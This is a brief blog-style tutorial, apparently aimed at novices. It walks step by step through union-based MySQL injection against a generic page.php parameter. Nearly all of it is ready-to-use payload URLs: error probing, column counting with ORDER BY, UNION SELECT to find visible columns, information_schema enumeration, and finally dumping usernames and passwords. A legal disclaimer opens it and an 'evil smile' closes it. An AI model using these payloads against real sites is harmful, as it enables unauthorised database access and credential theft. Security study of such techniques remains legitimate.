UNION BASED MYSQL INJECTION ---
This blog is for educational purposes only. Please do not use the skills gained from this blog to harm, attack or even test sites/etc. to which you do not have permission; it is illegal to do so. If you get caught (and mind you, you would), then don't say that you did not know. You have been specially warned.
Step 1: find a dynamic page
site.com/page.php?x=y
Step 2: append ' to check whether the page is vulnerable or not
site.com/page.php?xid=76'
now the website must give you some sign of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc
Step 3: Confirm that the page is vulnerable and find the injection type (string / integer) by applying --+
site.com/page.php?xid=76'--+
if there is no error, the injection type is string; otherwise try removing the '
site.com/page.php?xid=76--+
now the normal page should open, which means the injection type is integer; if it still doesn't, try another link
NOTE* if the injection type is string
site.com/page.php?xid=76' [sql injection here]--+
if the injection type is integer
site.com/page.php?xid=76 [sql injection here]--+
Step 4: get the number of columns in current query using order by (assuming injection type string)
site.com/page.php?xid=76' order by 1--+ no error
site.com/page.php?xid=76' order by 2--+ no error
site.com/page.php?xid=76' order by 3--+ no error
.
.
site.com/page.php?xid=76' order by n--+ error
this means the number of columns = n-1
Step 5: find the visible/vulnerable columns (assuming the number of columns = 4)
site.com/page.php?xid=76' union select 1,2,3,4--+
now you should see some or all of these numbers (the numbers that are visible are the vulnerable columns and can be used to get more info)
NOTE* if you don't see any numbers, try putting a - sign in front of the id
site.com/page.php?xid=-76' union select 1,2,3,4--+
if still no numbers then try another type of injection
Step 6: get the name of the database, the version and the MySQL user (assuming columns 2 and 3 are visible)
site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+
Step 7: get the names of the tables (assuming database name is xyz)
site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+
NOTE* if you only get a single row, use group_concat(table_name) instead of table_name
Step 8: get the names of columns (assuming table name is users)
site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and table_name='users'--+
Step 9: get the data (assuming the column names are user_name and user_pass)
site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+
Step 10: evil smile 3:)